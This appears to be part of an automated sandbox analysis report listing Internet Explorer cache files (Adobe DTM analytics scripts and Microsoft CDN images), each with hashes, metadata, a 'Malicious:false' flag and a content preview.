                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb1b9b3db2cdd45cf98521fb2fd2b132b-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCb1b9b3db2cdd45cf98521fb2fd2b132b-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(c,g){c.lineage={main_sel:\"MAIN\",zone_id:\"a3\",sec_custom_sel:\"\",grp_custom_sel:\"\",pnl_custom_sel:\"\",subpnl_custom_sel:\"\",exclude_sec_sel:\"\"},g.getLineageName=function(e,a){return e.attr(\"data-lineage-name\")||e.attr(\"data-productid\")||e.attr(\"data-vg\")||e.attr(\"id\")||a},g.setLineageSection=function(e,a,t){var i=\"r\"+t+a;e.attr(\"data-bi-id\",i),e.attr(\"data-bi-name\")||e.attr(\"data-bi-name\",e.attr(\"data-productid\")||e.attr(\"data-vg\")||e.attr(\"id\"));var n=\"DIV[data-grid*=col-12],DIV[data-grid*=col-10],SECTION[data-grid*=col-12],SECTION[data-grid*=col-10],SECTION[data-bi-area=body]\"+c.lineage.grp_custom_
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCc2141db146544563be4a301eefc1a8f3-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):565
                                                                                                                                                                                                              Entropy (8bit):5.3095710010522295
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefYp5xSu6ZxeQXect/BefYp5xSu6ZxeQXDLgU9EKI9Gf0x+BKxgQAhVlUwu+3:DYbo1JXect/BuYbo1JXoU9w9GFpQcCwf
                                                                                                                                                                                                              MD5:9B66B6EF3BC99920EA05A4043FA9D211
                                                                                                                                                                                                              SHA1:23C984F83072AE916CF9750CB52A106A853F727A
                                                                                                                                                                                                              SHA-256:0CC371710835318BBB6DFC4BE8CB57EFBD7A7EC724C96220B1DABDD6BA5A4B34
                                                                                                                                                                                                              SHA-512:2B8FF370EC59F26B1692423E0A4430B2F11A08579990E73F9F6842FDB4568A3D573AC050E39C448659D4E7698E83462D1FAAA4BDF8DF63D534E7B01C11C66DB5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCc2141db146544563be4a301eefc1a8f3-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCc2141db146544563be4a301eefc1a8f3-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/e6b4ca74378c/4549e8d059c7/RCc2141db146544563be4a301eefc1a8f3-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.twitter&&function(t,g){var a=function(){g.trackLoad(\"nvkh8\")};t.category_all_status||t.category.socialmedia.status?a():t.category.socialmedia.queue.push(a)}(window.wdgtagging,window.wdgtagging.twitter,window.jQuery);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCd384737517374f4fa832d0b0bd36eb65-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):3926
                                                                                                                                                                                                              Entropy (8bit):5.410795643723316
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:3UBBoDi6obNVb6ot67O6KHvdJJUTxCclC10RPD3B73Nw:3UBSvYNVPUS1vGbY18Pnw
                                                                                                                                                                                                              MD5:2371499F5F7FAD79DAE30FA3A966A2F7
                                                                                                                                                                                                              SHA1:FEB29D175FC3D4CE8FD43FADA53D8728064CA642
                                                                                                                                                                                                              SHA-256:F4363C717D1019458506523F41EB1F6897E1631E72E78892C0C88BF42E2A6B59
                                                                                                                                                                                                              SHA-512:51B914ADABBC2231F39B6EFD0503C37BF7CA65A7717DC62EDB1C1D0C123543E70903478E8F9FFC5B2AD63F4EC0CF9C778A889EEEFCDACCCD3A67369512EFF021
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCd384737517374f4fa832d0b0bd36eb65-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCd384737517374f4fa832d0b0bd36eb65-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/80899f83bd8d/3a0773d5334c/RCd384737517374f4fa832d0b0bd36eb65-source.min.js', "window.location.pathname.match(/help-me-choose/i)&&null!=window.wdgtagging&&(window.wdgtagging.jsll=window.wdgtagging.jsll||{},function(n,t,a,v){jQuery(\"META[name='awa-pageType']\").length<1&&a.setMetaTag(\"awa-pageType\",\"HMC-page\"),(t=t||{}).sdata={};var C=t.sdata;C.questions={};var q=C.questions;v(\"[data-scn-stepnum]\").each(function(){var t=\"q\"+v(this).attr(\"data-scn-stepnum\");q[t]=\"\"}),C.f2=\"\",v(document).on(\"mousedown\",\".questioncontent .startquestions\",function(){v(this).attr({\"data-bi-bhvr\":\"STARTPROCESS\",\"data-bi-scn\":\"hmc\"})}),v(document).on(\"click\",\"button.qoption\",function(){try{0==v(this).attr(\"aria-pressed\")?v(this).attr(\"data-mld-sorder\",null):v(this
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCd6437c73cb924b9aab22805dce17d69d-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4176
                                                                                                                                                                                                              Entropy (8bit):5.24127131536448
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:DUEjnt/BuUEjG3Uqj7MrCs3N+azrHXxvbG8qkvddqGQNCoKx33/baoesXbu02w6J:YEjnBBZEjowYaU678NTm//jLTfO
                                                                                                                                                                                                              MD5:3A266B9CA19505F9051BC6ED1C6C8CB9
                                                                                                                                                                                                              SHA1:8C71BDFE60D11AE5C9D6F1A6A3155AFD05FC72BC
                                                                                                                                                                                                              SHA-256:6AD99C9AB1483B93422F35F6DD814C7AFA28D8A93B0669C3A83620F02B097E33
                                                                                                                                                                                                              SHA-512:7EB887BC5FC97910B2FB75AA11FDBE1EF8860B25F2B081C8BD24B042E64CD01123BC43325CFB11DD91CE111AE0401E24110300DD3F86E68D2FCE3D81994F21CA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCd6437c73cb924b9aab22805dce17d69d-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCd6437c73cb924b9aab22805dce17d69d-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCd6437c73cb924b9aab22805dce17d69d-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(t,n,r){r(\".surface-clearfilters button\").on(\"mousedown\",function(){r(this).attr(\"data-bi-bhvr\",\"REMOVE\")}),r(\".c-checkbox input\").not(\".surface-hmc-ans-block INPUT\").each(function(){try{e=jQuery(this);var t=r(this).next(\"SPAN\").text();e.attr(\"data-bi-name\",n.tlcStr(t));var e=r(this),i=r(this).is(\":checked\")?\"APPLY\":\"REMOVE\";r(this).is(\":checkbox\")&&(i=r(this).is(\":checked\")?\"REMOVE\":\"APPLY\"),e.attr(\"data-bi-type\",\"option\"),r(this).attr(\"data-bi-bhvr\",i)}catch(a){n.debugLog(\"Error tagging name for Checkboxes section. Error: \"+a)}}),r(document).on(\"mouseenter\",\".c-choice-summary button\",functio
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCea4f316b14c64f09ba5ccdd90edaa2e0-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):23070
                                                                                                                                                                                                              Entropy (8bit):5.121408212640936
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:nWmvxE/hY1T2HnCW9duHw8HwYBiYDfneswTrdff:HvxE/hY1SHCW9IHpHwYnesk
                                                                                                                                                                                                              MD5:465CC00A2336DB80E77E709DC912C8A1
                                                                                                                                                                                                              SHA1:A78C28059DD90A918AFCCF4A4853776AF1D79A9E
                                                                                                                                                                                                              SHA-256:D1338129310E90B913FD70E6EA00FB8CA3E9CFE26EB407880540139CF55E07FD
                                                                                                                                                                                                              SHA-512:0BA42C1A5F3F735FDC1E580BECF3F9E5746824C45DF8A967B77FB1CF1FDE438EDC614C9B982AE1DC251A0B1D6D70B2C6912A2010771C8C06C38C4F8FC08FCD90
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCea4f316b14c64f09ba5ccdd90edaa2e0-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCea4f316b14c64f09ba5ccdd90edaa2e0-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCea4f316b14c64f09ba5ccdd90edaa2e0-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(t,o,s){window.location.hostname;var i,r,n,c=window.location.pathname;o.tagMSStoreBehavior=function(){return\"PARTNERREFERRAL\"},o.isMicrosoftStore=function(t){return t.attr(\"href\").match(/microsoftstore/i)||t.attr(\"href\").match(/microsoft\\.com/i)&&(t.attr(\"href\").match(/\\/store/i)||t.attr(\"href\").match(/\\/p\\//i))},o.tagChooseContentType=function(t){return 0<t.find(\"img\").length||0<t.find(\"picture\").length?\"image\":e(t,\"class\",\"glyph-play\")&&(t.find(\"span\").length<=0||e(t.find(\"span\"),\"class\",\"screen-reader\"))?\"button\":e(t,\"class\",\"mscom-popup-close|m-back-to-top|video_pp_button|ps-lightbox-close\")?\
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RCef8bdc3ef8454000925f7632ba7992db-source.min[1].js
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:ASCII text, with very long lines
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):613
                                                                                                                                                                                                              Entropy (8bit):5.316094479469897
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:12:jvgefCGr53ct/BefCGr52LgU9bZU9q/QiKoMoAVlUwub+dmkaxIBB:DP3ct/BuPNU9lUGnMCwuKIP2T
                                                                                                                                                                                                              MD5:8F395249BD71C0022A236CEBDC7BFBCE
                                                                                                                                                                                                              SHA1:DD1C37ECF799F0D1A6A5197B1D08E1FE2014099B
                                                                                                                                                                                                              SHA-256:06C5A6A220517290B0D9ABFCCE959F9AE80C182AC6FF477B1CCE5441C9581DD8
                                                                                                                                                                                                              SHA-512:8C8B46E6D6DEC815101F85F8958CEB4B1D6A33373AA8F2B88778FDD773823214EE56F8D2ACDC794C21C59BDA1DB99BB0268C0B723505C5976239B8666587C8B3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCef8bdc3ef8454000925f7632ba7992db-source.min.js
                                                                                                                                                                                                              Preview: // For license information, see `https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCef8bdc3ef8454000925f7632ba7992db-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/4c272e8cc694/45c34aabe1f8/RCef8bdc3ef8454000925f7632ba7992db-source.min.js', "null!=window.wdgtagging&&null!=window.wdgtagging.jsll&&function(g,n,i,t,w){var a=function(){w.init(\"3j9k5qxs6h\")};g.category_all_status||g.category.analytics.status?a():g.category.analytics.queue.push(a)}(window.wdgtagging,window.wdgtagging.jsll,window.wdgtagging.util,window.jQuery,window.wdgtagging.clarityTag);");
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE3oYjc[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 498x408, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):15095
                                                                                                                                                                                                              Entropy (8bit):7.868912015367946
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:z87u4zeDG/Ya1h3jFcQ0QCXUtM2NZebr2Z1noFubzFw3qzWFJHQ5b/fJ5oO+wnfT:z8yoeXaf3PCWZeSOgw8WFJH8jJC9Y
                                                                                                                                                                                                              MD5:4EDA5DCCD575F61F280E3F4CEC1EF117
                                                                                                                                                                                                              SHA1:7E9851E6512F6DB19BCE6E45089B57D6E39DBB73
                                                                                                                                                                                                              SHA-256:683B480386F694669DC4BD0B2C26585142D431CD705A9E2D13BBAB1EF426F996
                                                                                                                                                                                                              SHA-512:F906B74920FE03B0E6167D71116F2D1C312AE05601E3787F1EA390E3DD60244407E1CA27E154AA35D53F3E3FAB4C8FCE377222AB11F6D942472E93082B478D49
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE3oYjc?ver=e1aa&w=498&h=408&q=90&m=6&b=%23FFF0F0F0&f=jpg&o=f&p=0&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T...........".....................................................................................................................h..$.J.@.9.....1<...&R..W@.P.DAO.=........5..H..@...t..E......?B..0.&..z....r......&..L.`......$....}O.......>h..w ...._. .D.."N.y..&....l/K%......$."z.....r....q}6.....u..o.V....:...&.... ........<t......@....0 ..yM.*....>.s>.wk..bA.)JA.GU....n....Uy...l...HJS2......-.,......r........`..$...DDu?...v....8uC}s*.on.Y.....R.N/....xO...[..E....x..Q.3.5.m>..N...%2....:....g...O..C.a......".-.^?..ht.o......oy........:...4.3y~........O.c.........#..H.b..g....v9....9.-........|W...M...<n./.m\.nv;...m.....s]X.]v............o2.)......7|7.X4Sfj..o9n.*.cix.E.5.;lZr..0...7....2.........Q..b......+..b.-i8...a..z...%./..p....>e.zqV...b.V.s....P.L-..x......n...._.;.5.p...s.S..%..3(.....o
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE40OHB[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 279x157, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):4085
                                                                                                                                                                                                              Entropy (8bit):7.790104839302931
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:iFO7sK8RPeiZvZxbPdlYfTGedaf7gY8PA:iFGw2iZv3jDYfTGJgY8Y
                                                                                                                                                                                                              MD5:EA9589DDF3171B64265503CE41D98041
                                                                                                                                                                                                              SHA1:7CE1DBFEE73DCD75680802EFC8DCB937D2E2DA1D
                                                                                                                                                                                                              SHA-256:DC358B477E6157DCAED810A699AC70C24FC3D60198C33D9B633C552357EAE812
                                                                                                                                                                                                              SHA-512:ABB45D3A3BB75838E7BEB68F901D8D63E6CB6780E6160B1FB54ED1E8B7CE54A19F644DED9C024A0ECBD7E51E04B54CC86B5FF9D3AB86EC7655CF182A9F9165E4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE40OHB?ver=f3b3&q=90&m=6&h=157&w=279&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T..........."................................................................|.e\.........k#%...=...5..)....:..kS0.....l...^M.UR.*LS83......S.3.&+L.S4.,....L.w.._....O'..._d.6.K.0...8nN..+.....~O.......5.t._......rqu.............B>....."e.,S...P.t].O.1..5W^6.x...;...M0.J.]...`.....Z.....8.8.s....H.Q..9o.]Uu.T....u\...2.. ..@...................................................01...h.#.[.... ..o.8...O..Q.......G.W..;A...0.D............................................P&@0..:=....D.]0...D..\..h..gG.<...."[..#0-p..H..?...+...............................!@1.$0AQ`...............=...i..?....{.4^.M....{.3^...3%..{.2^......{.4^.....E...h..jjt..C-....{Y..O^'.......z.=x..O^'.......z.=@..{.........:.:.2.:.:.:.:.X..+.......\u.\u.\u.\u.\e.\e.\e.Qq....S..9..Ag.....+[.ReF5...:...:.2..*..:.,...O...F..I?:}...8{)ct.s..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE40Z6g[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 498x408, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):14396
                                                                                                                                                                                                              Entropy (8bit):7.882655930637131
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:r0voo8doR/XdGCuBTrFRt/AX5njdVWiph62:Avfg+/X1uBW5njdVBph3
                                                                                                                                                                                                              MD5:21341B7FBAB190A4DC904ED581394686
                                                                                                                                                                                                              SHA1:2C1029D0935185B2F08A1D6F2A56D2AFC87E1161
                                                                                                                                                                                                              SHA-256:A406F806F08133F8E7DC6383F284A419E73764B59BC809936891095C979C6DEC
                                                                                                                                                                                                              SHA-512:0797F9B28F4B4933EB10F788CDF4FEEB2420BFD0C735392027471B2A7AF006212A77E5795ABF0A0EFCA0196A00979009011903740FBBCC701BAC2D552ACDF8EE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE40Z6g?ver=8a7f&w=498&h=408&q=90&m=6&b=%23FFF0F0F0&f=jpg&o=f&p=0&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.................................................................! !,,;...........................................................! !,,;..........."...............................................................................................................................................4[V.m{f.Q..>.d0.....2.6e.hZ6..i..s...*.b.W...n......r...\....V.u..j.]...4.n:W}......D|.W.U.SS.`.C...<}Z..]........7.O...V'.c|.......i|....f......*.l..R.T...........Y..........%...uJ.Fk..yY)9Io..r3`z.`....8..t..O...}..RFV.?.u/S.{..@......-...11991..ZW....6.;j......x.?}D...3...._^.{..o.-:...........Q#.F.......k.R.........g...{..#.............K.q...~.^Q........Fw......04....:.<..".ycO._a.A}.......y..!.e2......"D....,e..5r.......%...g6.$............7\4..;.......7...5..Z.w..M.....@....^.w......i..z.......<..p..l/....~...E.{........y.......w...m..l...klln..}9.......?..Q,M:..Nd~..8._1..g[.*mkW...Z.j.s.et......^..d.5....wKy......&.1.W..S..~.m....._.+.....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4ASFJ[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 498x408, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):18730
                                                                                                                                                                                                              Entropy (8bit):7.93042281510872
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:yrkHbWrZh7s5w68vBe/93WNIFDIiOLFEDYDt:yg72s51kE/9cINN0
                                                                                                                                                                                                              MD5:F6C89E4ECB2BA7C22FB753F51D786E2F
                                                                                                                                                                                                              SHA1:B95213A1223B36FA0554BCE4F04A26B1DA8862E3
                                                                                                                                                                                                              SHA-256:E45BDF1BD53B44B73F7B67DACD96E7A959ED73C3A4C5E2C503D0A6DCD7323345
                                                                                                                                                                                                              SHA-512:D6B000FB5028DF746F413A59DCE8FFD290052245C2614E3EEDB9606E8853A3D268039587B622E51F70F8124AE0D89A7843B287845147704A984C8EC4325A3102
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4ASFJ?ver=2685&w=498&h=408&q=90&m=6&b=%23FFF0F0F0&f=jpg&o=f&p=0&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T...........".................................................+.............>@...?.._.z.@.....!...s.{...uU...v.........snq.9.;..U....ZO...........|..9......{/..gs...nN..-{........+D..S5...-.=6...~..=...............B|....d_.]u....^......;.....d......z...V..v^........?7.2d....&.z....].}.|.L...........l...z...>..W..K.........Q..d....2].......z.Q.......>^\..eL.2d.w..U.K.L.Y.........*d....*T.Wo.]_ns?k`......<...r..*\.S/.r..i.!......G..r...L.R..v..U.}..........rr.L..T.2..z...H...,.....Y...&d.s%.&T.7.^.r.!..G.@.....?5d.J.2L.R$L.~E..+h]....p......{..&\.2..~E.2n....;O.@.........l.2eL.r......a...N\.... .a.rgO.*D.r.].&e...W...G......x..K.;'&L.2.^.~L..j....{&`....1..[|..2R.J.v...$I...G.0.l.....0..L.:].7.^.]..kW.z...........*l.3e.v....4.o.6_K.\..^.......i.%.*\..n\.....X.7.>.........k..{..RdJ.ze.8...
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4Av4g[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 498x408, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):17154
                                                                                                                                                                                                              Entropy (8bit):7.925782728451459
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:384:acg1DEF/S9kHPiY15CCdmfBrF80Zmo3u00dMvpVV4/F0gJ5:ac2EBSeHPi45CCdmBFLZmoe00dSpzgFj
                                                                                                                                                                                                              MD5:AC95E945C6D3F4ABCD44C3D63E8BC6AC
                                                                                                                                                                                                              SHA1:243A359139836D0543DD9376B1186E037D2E5423
                                                                                                                                                                                                              SHA-256:C2B7FA37F8D90AD5A23FCE0D5BEF0540C82E67B2E47997E4CC34E99D973D9FAF
                                                                                                                                                                                                              SHA-512:4F6040D9CA3DC74B97286EE01C44DFB62A03071F785C68C2E58A879EFE0566D9BDCCB69EDBA4D39E86C3618EFA3483555F025028DEE6607D39A2D81D8B29B0A4
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4Av4g?ver=be22&w=498&h=408&q=90&m=6&b=%23FFF0F0F0&f=jpg&o=f&p=0&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T...........".................................................V................................................................i|........7~.~......a}..h.30.+.9.C.....|......../.}c.kLu&+x.liE..X..l.=...p...R.'.T.V..".1\u...t.T.-...~Y.4...)x..v:R)Z..kX&...h.M.Gb2.._......./.}q.)X...+....|......b..=.O....<......J....X...].&[W...?.......|k....LqX..V..."VV.[._..N.....<...Z.kHDEb+(..V&....?..O.....?....).1.*...!..D@'...P.....A.%K....X..f.."...D...~................"....Bl..C....}R.....?...5.q..,c..D..;fA..<..H...&...8+Y..+T..~...b.z....p...z_.z...........:[}..l..>.;.].....x.3.]....*.g.a..8.N...U.P...'|....s...mj~O..?h...[.1...>...}.S...w...J...0..<....q..a...v'*....t......~...~..r...:.>........4.....t.....1]O..E..cS.r.c.......<5?K....}S.....+...Lx.a..#W.....7..|o..z.....x.}{..a.f........?.&..jka....k#.....]...\..
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4HhPB[1].jpg
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 37x37, segment length 16, progressive, precision 8, 380x214, frames 3
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):9107
                                                                                                                                                                                                              Entropy (8bit):7.900591334370577
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:192:Oo6mEnG6O6G38qNAfS7+ZhFBBdiP+RjkvSi6UHWyGa:LI26G38q6f0sBrZhVi6kWyGa
                                                                                                                                                                                                              MD5:47DBB143E914BD0E53B6F22BA43B1DB7
                                                                                                                                                                                                              SHA1:6871FA5ECC8D75536B8222612B7A0C3A12DCE69A
                                                                                                                                                                                                              SHA-256:20B91141D7C7BA81803EA49BFCCF4EBD5C77CC90639A5F697B45E5CAAEE74D82
                                                                                                                                                                                                              SHA-512:25611E31928B0DC95F6C8137F1A921352631464456B1031767139D3556DC5AF180DCBD3B954118F00B6EC1A046F1A9ADA909F7411C4D4A3F1E4A615D14272414
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4HhPB?ver=857f&q=90&m=6&h=214&w=380&b=%23FFFFFFFF&l=f&o=t&aim=true
                                                                                                                                                                                                              Preview: ......JFIF.....%.%.............................................................&""&0-0>>T.......................................................&""&0-0>>T........|..".................................................`...................X.js."%......<v........=M<S..vl..<h..Z.n...P.....'ySM.Qf>3.#D...X..Z...@..j....o..].....,8P.A..-.?H.D........!.n...F.|5.v...c...........K....>.._m..*..&N.....7..R....t....._...,].H.kk...zo..?...R......=.%.z..[.m.ca....n6........R...e......sY.og.G..u<....z....O.6}.$..K...:.<h.W^..............Old^X.h..u.x..c1.a.c..........ss.Z.O........(Q"G......j}......p....$8..}".@.......-.......Z...G..Y..}P.....z..6.....b.9.ce=..@..<...L.j.~h......q.z...........Z...K....E.......c......:..]U.r..*...5^.&.S.{_.`....]c\.S.X.h.../.M<p...{........5.8.E.9.(.x.....G{..........Y\.....................................................................s...~k...M.t.4GE.{1.N.......zM....r:.......w..u....jp.%..[...zg.....r.,<.......g.h`....
                                                                                                                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\RE4IeLZ[1].png
                                                                                                                                                                                                              Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                              File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                              Size (bytes):363
                                                                                                                                                                                                              Entropy (8bit):7.163343749106006
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:6:6v/lhPmLtk/kPck/k0jwJ5Dc3zEkLT6JxFX8FYNOk5LG6OcFeTCXJitloQ9Dfo0s:6v/7OPFkEAC4JxFX8ORG6lFeMitD9Dw/
                                                                                                                                                                                                              MD5:8CD309238A884428BEDE6468337476D5
                                                                                                                                                                                                              SHA1:B3954DF479A40008DD7AA4F0F4CAB8125C50513E
                                                                                                                                                                                                              SHA-256:EF1E310D2C79263AECFCA5EE0EF820C316015156C5AE5ED373B0D256A061CA3F
                                                                                                                                                                                                              SHA-512:2FD037FD91A005A1E30AA3778728CC2810E2248387F4DA32E1F2DCC3E9AE2886CDBC61CDE2880A6ED730B9C5C5BFF7FC7A09BACFDED30EB3E713878D87F65CCF
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              IE Cache URL:https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE4IeLZ?ver=7753&q=90&m=6&h=48&w=48&b=%23FFFFFFFF&l=f&o=t&aim=true
